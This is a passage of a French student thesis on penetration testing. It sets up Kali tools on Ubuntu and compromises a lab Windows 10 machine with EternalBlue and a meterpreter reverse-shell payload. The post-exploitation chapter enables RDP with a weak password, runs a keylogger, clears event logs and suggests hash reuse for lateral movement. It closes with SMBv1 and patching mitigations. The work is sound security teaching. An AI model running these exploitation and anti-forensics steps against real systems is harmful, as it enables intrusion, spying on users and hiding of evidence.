 Cliquez sur Install Ubuntu pour démarrer l’installation du système d’exploitation.
Il existe aussi la possibilité de tester Ubuntu sans l’installer en sélectionnant Try
Ubuntu without installing (les données nécessaires au fonctionnement de l’OS seront
copiés dans la mémoire vive) puis de lancer l’installation depuis l’icône sur le Bureau.
 L’installeur d’Ubuntu, alias Ubiquity, se lance. On sélectionne la langue du système

Figure IV - III - 1ère étape de l'installation d’UBUNTU

36
CHAPITRE IV ENVIRONNEMENT ET OUTILS DE TRAVAIL

 Indiquez la disposition du clavier : Français – Français (AZERTY).

Figure IV - IV - 2ème étape de l'installation d’UBUNTU


 Dans Mises à jour et autres logiciels, sélectionnez

Figure IV - V - 3ème étape de l'installation d’UBUNTU

37
CHAPITRE IV ENVIRONNEMENT ET OUTILS DE TRAVAIL

 Sélectionnez l’option Erase disk and install ubuntu pour formater l’ordinateur et
installer ubuntu automatiquement si non sélectionnez l’option Something else pour
installer ubuntu avec d’autre système d’exploitation installé puis cliquez sur Continue.

Figure IV - VI - 4ème étape de l'installation d’UBUNTU


 Préparez et formater la partition d’installation d’ubuntu
- Filesystem : Ext4
- Mount point : /

Figure IV - VII - 5ème étape de l'installation d’UBUNTU

38
CHAPITRE IV ENVIRONNEMENT ET OUTILS DE TRAVAIL

 Si le disque dur est partitionné, validez le formatage de la partition vide en cliquant sur
Install now puis sur Continue.

Figure IV - VIII - 6ème étape de l'installation d’UBUNTU


 Sélectionnez le pays puis faites Continuer.

Figure IV - IX - 7ème étape de l'installation d’UBUNTU

39
CHAPITRE IV ENVIRONNEMENT ET OUTILS DE TRAVAIL

 Entrez le nom d’utilisateur, le mot de passe, le nom du PC, puis cliquez sur Continuer.

Figure IV - X – 8ème étape de l'installation d’UBUNTU

 L’installation d’Ubuntu 18.04 LTS commence !

Figure IV - XI - L'étape finale de l'installation d’UBUNTU

40
CHAPITRE IV ENVIRONNEMENT ET OUTILS DE TRAVAIL

L’installation prend plus ou moins de temps selon les performances du système (CPU,
SSD ou HDD…). Une fois l’installation terminée, redémarré le PC.
IV.2.2.logiciels de pentest

Pour tester la fiabilité et la puissance de notre système, nous avons utilisé et installé un
outil d’attaques contenu dans une distribution Linux gratuite portant le nom "Kali-Linux1".
Kali Linux est une distribution GNU/Linux sortie le 13 mars 2013, basée sur Debian. Cette
distribution est reconnue par les professionnels d’analyse réseau et de test d’intrusion. La
distribution a pris la succession de BackTrack. il propose plus de 600 programmes d’analyse
de sécurité préinstallés, dont on a choisi parmi eux : Armitage, Metasploit Framework
Nmap
 Description des différents outils de Kali Linux
Les différents outils de Kali-Linux sont classés dans le tableau suivant :

Outil Role
Information Gathering Contient tous les outils qui permettent de récupérer des informa-
tions, que ce soit concernant un protocole, une faille web, etc.
VulnerabilityAnalysis Les outils qui permettent de trouver des vulnérabilités dans un
protocole, un équipement, une vulnérabilité Web
Exploitation Tools cet outil permet l’exploitation des vulnérabilités détectées.
Forensics Tools outil permettant l’analyse de données sur le réseau (données ha-
chées ou chiffrées).
Maintaning Access Une fois l’accès à un système est réussi, cet outil permet de
revenir facilement sur ce dernier.
cet outil permet l’activité qui consiste à étudier un projet pour en
Reverse Engineering déterminer son fonctionnement interne ou sa méthode de
fabrication.

Tableau IV - 1 Les différents outils de Kali-Linux

 Ajouter le dépôt de logiciels Kali Linux

1
https://www.kali.org/

41
CHAPITRE IV ENVIRONNEMENT ET OUTILS DE TRAVAIL

Pour ajouter le dépôt, faites la combinaison des touches » Ctrl+Alt+T » pour ouvrir un
terminal et saisissez-y les commandes suivantes:

 sudo su
Pour exécuter les commandes en tant que root.
 apt-key adv --keyserver pgp.mit.edu --recv-keys ED444FF07D8D0BF6
ajouter le clé de KALI pour confirmer l’identité de dépôt .

Figure IV - XII - l'ajoute de clé de dépôt "KALI"

 echo 'deb http://http.kali.org/kali kali-rolling main contrib non-free' >>


/etc/apt/sources.list
ajouter le dépôt .

Figure IV - XIII - L'ajoute de dépôt "KALI"

 apt-get update
mettre a jours la liste des dépôts.

Figure IV - XIV - le mis a jours de la liste des dépôts

42
CHAPITRE IV ENVIRONNEMENT ET OUTILS DE TRAVAIL

a) Metasploit-Framework
Metasploit Framework est une collection d'outils couramment utilisés qui fournissent un
environnement complet pour les tests d’intrusion et le développement d'exploits.
 Exploit : Un exploit est le moyen (un script, par exemple) qui permet d'exploiter une
vulnérabilité. Un attaquant utilise un exploit pour attaquer un système de façon à lui faire
produire un certain résultat que les développeurs n’avaient pas envisagé. Les exploits
courants sont le buffer overflow (dépassement de tampon), les vulnérabilités web
(injections SQL, par exemple) et les erreurs de configuration.1
 Payload : Un payload est un code exécuté par le système cible lors de l'exploit. Par
exemple, un reverse shell est un payload qui crée une connexion depuis la cible vers
l’attaquant, alors qu’un bindshell est un payload qui "attache" une invite de commande à
l’écoute d’un port sur la machine cible, afin que l’attaquant puisse alors se connecter. Un
payload peut être également quelque chose d’aussi simple que quelques commandes à
exécuter sur la machine cible.1
 Shellcode : Un shellcode est une suite d’instructions utilisées par un payload lors de
l’exploitation. Il est typiquement écrit en langage assembleur. Dans la plupart des cas, le
code assembleur du payload sert à ouvrir un shell (un invite de commande système) sur la
machine vulnérable, d’où le nom.1
 Module : Un module, dans le contexte de ce livre, est une part de logiciel qui peut être
utilisée par le framework Metasploit. Parfois, vous aurez besoin d’utiliser un module
d’ex-ploit, un composant logiciel qui porte l’attaque. D’autres fois, un module auxiliaire
pourra être requis pour effectuer une action telle que le scan ou l’énumération de
systèmes. Cette modularité est ce qui rend Metasploit si puissant.1
 Listener : Un listener est un composant de Metasploit qui attend une connexion entrante
de tout type. Par exemple, après que la cible a été exploitée, elle peut communiquer avec
l’attaquant via Internet. Le listener gère cette connexion, attendant sur la machine
attaquante d’être contacté par la machine exploitée.1
 Auxiliairy :(auxiliaire en français) C’est des modules utilisés pour diverses taches
comme le scan de port, sniffing, scan de services. Une fois l’exploit et le Payload sont

1
http://florentfauvin.atspace.cc/node69.html

43
CHAPITRE IV ENVIRONNEMENT ET OUTILS DE TRAVAIL

exécutés sur une machine vulnérable, on peut faire ce qu’on veut sur le système comme
télécharger les données de la cible, mise en place d’un malware, capture d’ecran, etc.1

 MSFConsole : Le msfconsole est vraisemblablement l'interface la plus utilisée par les


Pentesters. Il fournit une console tout en un et il permet un accès fort efficace à la quasi-
totalité des possibilités disponibles dans MSF. Msfconsole peut sembler effrayant et
compliqué au début, mais une fois que vous avez appris les différentes mécaniques
d’utilisation, vous apprécierez le large éventail des possibilités qui s’offrent à vous.

Figure IV - XV - Metasploit-Framework Console

 Eternalblue

ETERNALBLUE est un exploit développé par la NSA. Il est révélé et publié par le
groupe de hackers The Shadow Brokers le 14 avril 2017. Cet exploit utilise une faille de sécurité
présente dans la première version du protocole SMB (SMBv1). Bien que cette faille de sécurité
ait déjà été résolue par Microsoft par une mise à jour de sécurité publiée le 14 mars 2017 (MS17-
010) de nombreux utilisateurs de Windows n'avaient toujours pas installé ce correctif de sécurité

1
https://www.offensive-security.com/metasploit-unleashed/auxiliary-module-reference/

44
CHAPITRE IV ENVIRONNEMENT ET OUTILS DE TRAVAIL

lorsque, le 12 mai 2017, le ransomware « WannaCry » utilise cette faille de sécurité pour se
propager. 1
Un module de l’exploit Eternalblue a été porté sur Metasploit par des chercheurs en
sécurité .Le but de la création de ce module est de montrer l’impact de l’exploit et de permettre
aux Pentesters de mieux sécuriser les systèmes informatiques des entreprises.

Pour installer le module pour exploiter cette vulnérabilité, suivez les étapes suivants en
tant que l’utilisateur ROOT comme toujours :

apt-get install git


git clone git clone https://github.com/F17mous/fsociety.git
cp fsociety/fsociety.rb /root/.msf4/modules/exploits/windows/smb/fsociety.rb
 Installation de Metasploit-Framework

Ils y a plusieurs méthodes pour installer Metasploit-Framework, cette méthode est la plus
facile. Saisissez les commandes suivantes (en tant que ROOT user) pour installer et configurer
la Framework.

 apt-get install armitage && apt install metasploit-framework


Permets d’installer Metasploit-Framework et Armitage.

Figure IV - XVI -L'installation de Metasploit-Framework

1
https://fr.wikipedia.org/wiki/EternalBlue

45
CHAPITRE IV ENVIRONNEMENT ET OUTILS DE TRAVAIL

 msfconsole
Pour lancer Metasploit-Framework.

Figure IV - XVII - Le lancement de la console Metasploit

 msfdb init
Pour configurer la base des données de MSFCONSOLE.

Figure IV - XVIII - Configuration de la base des données de MSFCONSOLE

 db_status
Pour vérifier l’état de base des données.

46
CHAPITRE IV ENVIRONNEMENT ET OUTILS DE TRAVAIL

Figure IV - XIX - Vérification de l'état de base des données

 db_rebuild_cache
Pour un fonctionnement plus rapide.

Figure IV - XX - la création de cache des modules

b) armitage
Armitage est une interface graphique pour Metasploit qui visualise les cibles, recommande
les exploits et expose les fonctionnalités de post-exploitation avancées dans la structure.
C’est une interface graphique avec des fonctionnalités supplémentaires.

47
CHAPITRE IV ENVIRONNEMENT ET OUTILS DE TRAVAIL

Figure IV - XXI - L'interface Graphique Armitage

 configuration d’armitage
Avant de configurer Armitage vous devez d’abord configurer Metasploit-Framework
puis suivre les étapes suivantes (toujours en tant que ROOT user) :
 systemctl start postgresql
Pour démarrer le système de gestion de base de données PostegreSQL.

Figure IV - XXII - le démarrage de PostegreSQL

 armitage

Figure IV - XXIII - Connexion à la base des données msf

48
CHAPITRE IV ENVIRONNEMENT ET OUTILS DE TRAVAIL

 Après avoir démarré Armitage et cliquez sur connect

Figure IV - XXIV - Démarrage de Metasploit RPC Server


 Cliquez sur YES pour démarrer msfrpcd. Après un bref délai, vous devriez recevoir l'interface
graphique d'Armitage.

Figure IV - XXV -Le 1er démarrage d'Armitage

c) NMAP
Nmap est un outil open source disponible sur mac Linux FresBSD sur Windows…
permettant de scanner les ports d’un réseau. Il permet de savoir si une machine est sur un réseau
de pouvoir le scanner et ensuite identifier les services qui tournent dessus.1

Le but est de pouvoir vérifier la sécurité de nos machines et de détecter d’éventuelles failles
de sécurité via les ports ouverts. Avec Nmap on peut également obtenir les informations sur le
système d’exploitation d’un ordinateur distant. 2

1
: https://www.supinfo.com/articles/single/3026-qu-est-ce-que-nmap
2
: https://www.supinfo.com/articles/single/3026-qu-est-ce-que-nmap

49
CHAPITRE IV ENVIRONNEMENT ET OUTILS DE TRAVAIL

Ce logiciel est de plus en plus utile par les administrateurs réseaux car l’audit des résultats de
Nmap fournit des indications bien précises d’un réseau
 Installation de Nmap
Nmap est automatiquement installé avec Metasploit-Framework et ne nécessite aucune
configuration. Pour confirmer l’installation, simplement exécuter la commande suivant en tant
que l’utilisateur ‘ROOT’.
apt-get install nmap

IV.3.Terminologie

 Root : L’administrateur système linux s’appeler le root.


 Le Terminal : un programmequi émule une console dans une interface graphique, il
permet de lancer des commandes. C’est l’équivalent au CMD sur Windows.1
 APT Repositories : (dépôts APT en français) sont des "sources de logiciels",
concrètement des serveurs qui contiennent un ensemble de paquets. À l'aide de
2
gestionnaire des paquets pouvez accéder à ces dépôts.
IV.4.Conclusion
Dans ce chapitre, nous avons décrit tout ce qui est nécessaire pour la configuration et la
préparation d’environnement de test. Pour la deuxième machine (Windows 10) il n y a aucun
configuration nécessaire.
Dans le chapitre suivant on va voir comment utiliser ces utilitaires pour réaliser un test
d’intrusion.

1
https://doc.ubuntu-fr.org/terminal
2
https://doc.ubuntu-fr.org/depots

50
CHAPITRE V: REALISATION DE TEST D'INTRUSION

V.1.Introduction

Différents outils et techniques ont été utilisés dans différentes phases des tests
d’intrusion. Dans chaque phase on a décrit les différents tests réalisés démontrés par les
commandes utilisées, suivis par les résultats collectés, lors des attaques réalisées à l'aide d'une
combinaison d'outils qui seront abordés dans ce chapitre.

V.2.Collecte d’informations (Intelligence Gathering)

La collecte d’information a été effectuée par des sondages de réseau, des analyses de
ports et des empreintes de systèmes d’exploitation (OS). Nmap avec quelques autres outils
comme Angry IP Scanner, MSF Ports Scanner ont été utilisés pour la collecte d'informations.
Nmap a été largement utilisé car il donnait beaucoup de flexibilité dans la désignation des cibles.
Nmap a été utilisé pour identifier le nombre d'hôtes hébergés sur le réseau et leur adresse IP
associée.

V.2.1.L’Analyse du réseau

Cette section décrit les résultats collectés lors de l'analyse du réseau, Système d'exploitation
et énumération de services.

 Détection de machines
Le premier type de scan qui peut être utile, est le scan de machines. Il permet de lister les
machines disponibles sur le réseau, et retourne leur IP, leur adresse MAC, et éventuellement leur
nom d’hôte.

50
CHAPITRE V: REALISATION DE TEST D'INTRUSION

Figure V -I - Le scan ARP

Le scan se fait à l’aide de requêtes ARP sur toutes les IP possibles, à condition qu’elles
soient dans notre sous-réseau. Si les adresses IP de destination sont dans un autre sous réseau,
des requêtes de Ping sont utilisées.

 Scan de ports

Maintenant que nous avons connaissance des hôtes présents sur le réseau, il peut être
intéressent d’en savoir un peu plus sur ceux–ci. Nous allons donc procéder à un scan de ports.

 Scan TCP SYN

Figure V -II - Le scan TCP SYN

51
CHAPITRE V: REALISATION DE TEST D'INTRUSION

Ce scan est le type de scan par défaut. Il permet de détecter les ports TCP ouverts en
envoyant des SYN. Si le port est ouvert, la machine répondra par un SYN / ACK. Si le port est
fermé, la machine répondra par un RST. Si après plusieurs essais il n’y a pas de réponse, le port
est considéré comme filtré.

La commande suivante permet de scanner une liste de ports spécifiques

Figure V - III - Le scan des ports

 Scan no ping
Si le Ping est utilisé comme vérification, et que la machine cible est configurée pour ne pas
répondre au Ping, le scan n’aura alors pas lieu. Avec cette option, le scan est réalisé sans
vérification du statut de l’hôte.

Figure V - IV - Le scan sans ping

52
CHAPITRE V: REALISATION DE TEST D'INTRUSION

V.2.2.Détection des services et de versions


Autre fonctionnalité intéressante, la détection de services et de versions. Elle permet de
lister les services qui tournent sur une machine. Pour chaque port ouvert, Nmap va indiquer le
service correspondant.
Par example:
- Port 80 ouvert : serveur Web
- Port 445 ouvert : Microsoft-DS (pour le partage de fichiers)

Voici le résultat d’une analyse de versions sur le port 445 :

Figure V -V - Détection de la version de service Microsoft-DS

Nous pouvons voir que Nmap a bien identifié la version de service Microsoft-DS.

V.2.3.Détection d’OS

Pour trouver l’OS, Nmap analyse l’empreinte TCP/UDP de la machine distante, pour en
déduire l’OS. Chaque OS aura sa propre empreinte et Pour faire la détection, Avec Armitage. Cet
utilitaire envoie une série de paquets TCP et UDP, et analyse les réponses. Le résultat et plus
précise que Nmap.
Pour ajouter lancer Armitage , faites la combinaison des touches « CTRL + ALT + T » pour
ouvrir un terminal et saisissez la commande suivante:

 sudo armitage

Nous voici devant la fenêtre d'utilisation d'armitage.

53
CHAPITRE V: REALISATION DE TEST D'INTRUSION

Figure V - VI - L'interface graphique Armitage

Nous allons à présent scanner la machine cible présente sur le réseau.

Figure V -VII - Le scanner MSF

Pour cela il suffit de taper l'adresse de la machine cible obtenu dans le scan Nmap.

54
CHAPITRE V: REALISATION DE TEST D'INTRUSION

Figure V - VIII - L'adresse IP de la machine cible

Une fois le scan est terminé, le résultat s’affiche dans la boite des commandes dessus

Figure V -IX - La détection de système d'éxploitation

 Système d’exploitation : Windows10 Enterprise


 Numéro de la version : 10240
 Nom de la machine : Chouieb

V.2.4.Conclusion
La collecte d’information a constitué la base de la prochaine phase d’analyse et
d’évaluation des vulnérabilités. Plusieurs hôtes vivants ont été identifiés. Certain hôte identifié a
ensuite été énuméré pour rechercher les ports ouverts et les services exécutés sur ces ports. Au
cours de l'énumération, il a montré que l’hôtea un système d'exploitation Windows. Nmap était
principalement utilisé pour l'analyse des ports, le système d'exploitation et l'énumération des
services, mais armitage est plus précise dans l’analyse de système d’exploitation. Par
conséquent, Nmap était l'un des outils polyvalents utilisés lors de la collecte d’information.

55
CHAPITRE V: REALISATION DE TEST D'INTRUSION

V.3.Analyse et évaluation des vulnérabilités

Au cours de cette phase, toutes les informations recueillies ont été affinées pour
compléter la technique d’analyse et d’évaluation de la vulnérabilité. Normalement, le scanner
automatisé et la technique manuelle sont utilisés, mais les techniques manuelles nécessitent plus
de temps pour perfectionner l'analyse et identifier les vulnérabilités. Cependant, les techniques
d'analyse automatisées et manuelles doivent être utilisées pour obtenir des informations
complètes sur les vulnérabilités éventuelles pouvant avoir affectées le système ou le réseau.
Supposons que, si le système ou le réseau à tester possède un réseau étendu avec des centaines de
systèmes, la technique manuelle ne serait pas une approche efficace et efficiente.
V.3.1.Évaluation de la vulnérabilité avec Armitage (scanner automatisé)
Nous allons à présent chercher dans la base de données les attaques disponibles pour le
réseau.
Allez dans le menu "Attacks" puis sélectionnez "Find Attacks".

Figure V - X - La recherche des modules pour exploiter la machine

Une fois la recherche finie, une alerte nous indique qu'un menu est à présent disponible au clic
droit sur la cible.

56
CHAPITRE V: REALISATION DE TEST D'INTRUSION

Figure V -XIL - L'analyse des modules complète

Un fois dans ce menu nous pouvons visualiser la liste des vulnérabilités.

Figure V -XII - Menu des attaques disponibles

V.3.2.Évaluation de la vulnérabilité avec MSFConsole


C'est aussi une excellente méthode pour scanner votre réseau, mais cela prend beaucoup de
temps comparé à la première méthode.

- Ouvrir msfconsole et saisissez les commandes suivantes


use module auxiliary/scanner/smb/smb_ms17_010

setRHOSTS192.168.1.19

setRPORT445

57
CHAPITRE V: REALISATION DE TEST D'INTRUSION

Figure V -XIII - Détection de la vulnérabilité MS17-010

Le module a détecté l’OS de la machine et a pu conclure que la cible est vulnérable à


Eternalblue.
V.3.3.Conclusion
Les rapports de test automatisés et manuel indiquent que l’hôte sur le réseau été
vulnérable au plusieurs attaques. Les vulnérabilités identifiées devaient encore être vérifiées pour
savoir si elles étaient exploitables ou non. Pour plus d'investigations, le pentester doit effectuer
les phases d'exploitation et de post-exploitation.
V.4.Exploitation
Au cours de cette phase, les vulnérabilités identifiées seront vérifiées pour déterminer si
elles présentent une réelle menace pour la sécurité. Cette phase a agi comme la vérification des
vulnérabilités potentielles et ainsi, a entraîné le plus grand risque dans un test d’intrusion. Durant
cette phase d'exploitation, les vulnérabilités seront exploitées en utilisant des exploits accessibles
au public.
V.4.1.L’exploit Eternalblue porté sur Metasploit
On a déjà parlé de WannaCry, ce ransomware qui s’est propagé à une vitesse éclaire à
travers plus de 150 pays dans le monde entier. Pour parvenir à leur fin, les auteurs du
ransomware ont fait usage d’un exploit nommé EternalBlue, basé sur une vulnérabilité SMB. Cet
exploit fut révélé il y’a quelques mois par le fameux groupe de pirates The Shadow Brokers.

 Dans la console de MSFConsole,saisissez-y le commandes suivantes

58
CHAPITRE V: REALISATION DE TEST D'INTRUSION

Cette étape consiste à lancer le module:


use exploit/windows/smb/fsociety
Pour choisir le Payload,il suffira d’exécuter la commande suivante :

set payload windows/meterpreter/reverse_tcp


Maintenant, exécuter la commande show targets Pour voir tous les méthodes disponibles à
choisir pour envoyer le payload.

Figure V - XIV - Les méthodes disponibles


La dernière étape avant l’exploitation est la définition du valeur de chaque option avec la
commande set :
En ce qui concerne notre test, nous n’insérerons que l’adresse IP de la cible avant de lancer
l’exploit, la modification des autres options est facultative.

Figure V - XV - Préparation de l'attaque

59
CHAPITRE V: REALISATION DE TEST D'INTRUSION

LHOST => l’adresse de la machine locale (l’attaquant)


RHOST => l’adresse de la machine cible
LPORT=> le port utilisé dans la machine locale pour exécuter l’attaque
TARGET=>la méthode pour envoyer le payload
à la fin l’exécution des commandes d’exploitation : exploit

Figure V -XVI - Exécution de l'attaque


Après une exploitation réussie, nous avons obtenu le message suivant :
« Meterpreter session x opened.. »
V.5.Post-Exploitation

Cette phase du test d’intrusion est liée à la phase d'exploitation. Une fois les systèmes
cibles compromis, la post-exploitation consiste à identifier les expositions potentielles du
système et à exploiter d'autres faiblesses, afin de déterminer à quel point le testeur / attaquant
peut pénétrer à l'intérieur du système ou du réseau. Dans ce réseau, l'hôte sur 192.168.1.19 a été
compromis avec succès grâce à MSFConsole et Armitage basée sur les vulnérabilités
exploitables. Cette section montre comment la post-exploitation a été effectuée sur l'hôte
192.168.1.19.
Voici l’interface Armitage et la console MSF après l’exploitation :

60
CHAPITRE V: REALISATION DE TEST D'INTRUSION

Figure V - XVII - Armitage après une attaque réussie

V.5.1.Commandes de meterpreter
Maintenant nous allons ouvrir une session de meterpreter, un clic droit sur la machine
cible puis on choisit : Meterpreter 2 =>Interact =>Meterpreter Shell

Figure V - XVIII - Exécution du Shell Meterpreter

61
CHAPITRE V: REALISATION DE TEST D'INTRUSION

Une session Meterpreter est ouverte, ce qui nous donne le contrôle total de la machine. Ici
nous allons voir la liste des principales commandes meterpreter nécéssaires pour bien
manipuler le système comme ainsi d’utiliser toute la puissance des scripts.
 sysinfo
Cette commande affiche les informations sur le système d’exploitation utilisé par la victime.
 checkvm
Utilisée pour voir sion exploite une machine virtuelle ou non.
 shell
Nous donne la possibilité d’ouvrir une boîte de dialogue CMD
 clearev
Pour effacer les traces dans la machine « évènements d’application, system et de sécurité »
V.5.2 modules de post-exploitation
Maintenant, quelques modules importants dans la phase post-exploitation :
 windows/manager/enable_rdp
Ce module nous permets d’activer le service Remote Desktop « RDP », ce services est utilisé
pour controler la machine à distance.
Dans l’onglet « console » on tape les commandes suivantes :
use post/windows/manager/enable_rdp
Pour choisir ce module
set USERNAME mr_robot
Le nom d’utilisateur de RDP
set PASSWORD 1234
Le mot de passe pour se connecter à RDP
set SESSION 7
Numéro de la session meterpreter
set ENABLE true
Pour activer (true) ou désactiver (false) RDP
Les autres commandes sont facultatives.
A la fin :
run –j

62
CHAPITRE V: REALISATION DE TEST D'INTRUSION

Pour exécuter ce module

Figure V - XIX - Activation de service RDP


Installer un logiciel client de RDP si il n’est pas encore installé, et puis connecté en
utilisant le nom d’utilisateur et le mot de passe choisi.
 Exemple de logiciel client de RDP : Remmina
La commande de Terminal pour installer : sudo apt-get install remmina

Figure V -XX - Manipulation de machine cible via RDP

 windows/capture/keylog_recorder
Ce module permet d’enregistrer tout ce qui est tapé sur un clavier.
Le même principe des commandes
use post/windows/manager/keylog_recorder
Pour choisir ce module

63
CHAPITRE V: REALISATION DE TEST D'INTRUSION

set SESSION 7
numéro de la session meterpreter
Les autres commandes sont facultatives.
Finalement :
run –j
Pour exécuter ce module

Figure V - XXI - Activation de l'enregistreur de frappe

V.6.Rapport
Au cours de ce test, l’hôte sur l’adresse 192 .168.1.19 a été compromise avec succès.
Utilisant Metasploit-Framewrok basée sur les vulnérabilités exploitables. L’exploit réalisé sur
l'hôte prouvé que de telles vulnérabilités existent encore même dans les dernières versions de
Windows. Par conséquent, ces résultats montrent la valeur du test d'intrusion et prouvé aussi que
de tels tests sont toujours utiles pour identifier les liens faibles dans un réseau ou système. Il peut
fournir à l'administrateur du réseau et du système beaucoup d'informations pour prendre des
mesures correctives contre ces vulnérabilités. Pour sécuriser l'ensemble du réseau ou d'un
système si elle est effectuée correctement et méthodologique.
La vulnérabilité ETERNALBLUE avait un patch publié par Microsoft sur le bulletin
MS17-010.Par conséquent, pour atténuer cette vulnérabilité, les systèmes affectés doivent
appliquer le patch immédiatement, la version de Windows doit être mise à jour ou mis à niveau
vers la version la plus récente et les administrateurs réseaux / systèmes doivent fermer les ports
qu'ils n'utilisent pas et désactiver le partage de fichiers.

64
CHAPITRE V: REALISATION DE TEST D'INTRUSION

 Désactiver le partage SMBv1


La première étape pour sécuriser le système est la désactivation de la version ancienne de
protocole de partage des fichiers sur windows 10. Pour le réaliser, on suit les étapes suivantes :
 Ouvrir une console Exécuter (touche Windows + R).

Figure V -XXII - La console "Exécuter"

 Taper : optionalfeatures
 Dans la liste, chercher et décocher la ligne « Support de partage de fichiers SMB 1.0 /
CIFS » :

Figure V -XXIII - La fenêtre des Fonctionnalités de Windows

 Valider par OK et redémarrer l’ordinateur. Le partage SMB version 1 est maintenant


désactivé.

65
CHAPITRE V: REALISATION DE TEST D'INTRUSION

 Vérifier les mis a jours Windows 10


 Ouvrir le menu Démarrer et cliquer sur l’icône de roue dentée pour ouvrir les Paramètres :

Figure V - XXIV - "Menu démarrer" de Windows 10

 Choisir « Mise à jour et sécurité » :

Figure V - XXV - Mis a jours de Windows 10

 A gauche, cliquer sur « Windows Update » :

Figure V - XXVI - La recherche des mises a jours disponibles


Vérifier l’état des mises à jour du système. Si la date de dernière vérification est trop ancienne,
cliquer sur « Rechercher des mises à jour » et installer ce qui est proposé.

66
CHAPITRE V: REALISATION DE TEST D'INTRUSION

V.8.Conclusion
À ce point, nous pourrions attaquer d’autres machines sur le réseau interne en utilisant à
la fois Metasploit et Meterpreter. Si le réseau était plus grand, nous pourrions pénétrer celui-ci en
utilisant les informations issues des différents systèmes présents. Par exemple, dans ce chapitre,
nous avons compromis un hote sous Windows 10. Nous pourrions utiliser la console Meterpreter
pour extraire les valeurs « hash » du système puis les utiliser pour s’authentifier sur d’autres
systèmes sous Windows. Le compte d’administrateur local est généralement le même d’un
système à l’autre, donc même dans un environnement d’une grande entreprise, nous pourrions
utiliser les informations d’un système pour baser nos attaques sur un autre système.
Dans ce chapitre nous avons utilisé une méthode, mais il y a plusieurs méthodespour les
systèmes, et plusieurs chemins d’attaque dont vous pouvez tirer profit. Tout cela viendra avec le
temps et l’expérience.

67
Conclusion Générale

Le succès de tout test d’intrusion dépend de la méthodologie utilisée. Pour réussir un test
d’intrusion, la méthodologie doit également utiliser différents outils de sécurité. Notre travail a
commencé par une présentation de l’organisme d’accueil, afin de prendre connaissance de
l’entreprise ainsi que de son environnement et l’architecture de son réseau. L'un des objectifs de
notre mémoire était d'examiner différents outils et techniques de sécurité. Différents outils tels
que Nmap, Armitage et Metasploit-Framework ont d'abord été introduits et examinés. Le choix
des outils a été basé sur sa flexibilité, sa convivialité et son efficacité. Avec tous les outils en
main, chaque phase de la méthodologie a été réalisée d’une manière systématique et
méthodologique. Les outils sélectionnés ont été divisés en trois catégories. La phase de collecte
de renseignements couvrait les outils, qui contribuaient au profilage du réseau, à la numérisation
du réseau et à la prise d'empreintes digitales des systèmes d'exploitation et des services. Nmap a
été identifié comme l’un des meilleurs outils à utiliser durant cette phase. La phase d'analyse et
d'évaluation de la vulnérabilité couvrait les outils, ce qui permettait d'explorer les vulnérabilités
du réseau et du système. Armitage et MSFConsole étaient les meilleurs outils à utiliser lors de la
phase d'analyse et d'évaluation de la vulnérabilité. L'outil couvert des phases d'exploitation et de
post-exploitation permettait d'exploiter les vulnérabilités identifiées. Le Metasploit-Framework
était plus qu'un outil. C'était un Framework complet de tests d’intrusion, mais il peut aussi être
utilisé comme un outil au cours de phases d'exploration et de post-exploitation en raison de son
abondance d'exploits arbitraires, la facilité d'utilisation et de l'efficacité. Cependant, le meilleur
outil et le plus puissant dont dispose un Pentester est le "cerveau", car les tests d’intrusion ne
concernent pas toujours l'outil. Les outils et les techniques peuvent simplement être une question
de choix et d’expertise.

En conclusion, si les outils et la méthodologie sont correctement utilisés, ils peuvent être
utiles pour comprendre les faiblesses du réseau ou des systèmes et la manière dont elles
pourraient être exploitée. Les tests d’intrusion ne sont pas une alternative d'autres mesures de
sécurité. En fait, il devrait être utilisé pour compléter le principe de la défense en profondeur.

68
Bibliographie

[1] – Computer Information System company. https://cisco.com/c/en/us/products/index.html .

[2] – Federal Office for Information Security (BSI). https://www.bsi.bund.de/EN .

[3] – Elie MABO , La sécurité des systèmes informatiques (Théorie) , supportdecours , 2010 .

[4] – Cyberworld Awareness and Security Enhancement Services – Luxemburg


https://www.cases.lu/vulnerabilites.html

[5] – Comodo Securebox , https://securebox.comodo.com/

[6] – Vincent Erceau & Romain Colombier, «GMSI Informatique », Projet SAS , 2011.

[7] – Master VPN , Définition d’un VPN , https://master-vpn.fr/definition-vpn.html .

[8] – Pratum, Why IDS and IPS are still important.


https://pratum.com/blog/262-why-intrusion-detection-and-prevention-systems-are-still-important

[9] – Techtarget.com, Search Networking , Network Penetration Testing Guide.


https://searchnetworking.techtarget.com/tutorial/Network-penetration-testing-guide

[10] - Richard R. Linde , "Operating system penetration". 1975

[11] – M. Bishop. "about penetration testing.". IEEE Security & Privacy, pages 84-87, 2007

[12] – Karen Scarfone (NIST) , “Technical Guide to Information Security Testing and
Assessment”

[13] – R. Budiarto, “Development of penetration testing model for increasing network security” .

69
[14] – Michelle Fiocca, "literature study of penetration testing” http://www.ida.liu.se/ .

[15] –Blackhat Website , Recommendations for perfirming more secure tests,


https://www.blackhat.com/docs/us-17/wednesday/us-17-McGrew-Protecting-Pentests-
Recommendations-For-Performing-More-Secure-Tests-wp.pdf .

[16] – InformationSecurity , Test d’intrusion, https://www.information-security.fr/test-


dintrusion-pentest-presentation-methodologies/ .

[17] – Github , F17mous , Fsociety Metasploit Module , https://github.com/f17mous/fsociety .

[18] – PentestIt , http://pentestit.com/ .

[19] – Network Mapper, https://nmap.org/man/fr/ .

[20] – Ubuntu Linux, https://doc.ubuntu-fr.org/ .

[21] – Shakeel Ali, Tedi Heriyanto, “BackTrack 4: Assuring Security by Penetration Testing” .

[22] – Pen-Tests, Penetration Testing Tools , http://www.pen-tests.com/ .

[23] – Kimberly Graves, CEH Certified Ethical Hacker Study Guide .

[24] – “Mr. Robot“ Hacks, https://null-byte.wonderhowto.com/how-to/mr-robot-hacks/ .

[25] – SUPINFO, International University , https://www.supinfo.com/cours/ .

[26] – Microsoft , Microsoft Security Bulletin MS17-010 – Critical,


https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010 .

70
Résumé
Dans l'environnement informatique distribué d'aujourd'hui, où les réseaux informatiques
et Internet sont un moyen de communication et d'échange d'informations, La sécurité est
désormais une exigence de base parce que l'informatique distribuée est tout simplement non
sécurisé. Il existe différentes mesures de sécurité que les administrateurs de réseau peuvent
appliquer pour sécuriser le réseau ou le système, Cependant, la meilleure méthode pour garantir
la sécurité d’un réseau ou système est d’effectuer des tests d'intrusion.
Au cours de notre mémoire, nous avons identifié et expliqué une méthodologie
appropriée pour les tests d’intrusion. Nous avons également illustré des outils et des techniques
gratuits et Open-Source pour simuler une attaque que les administrateurs réseau et système
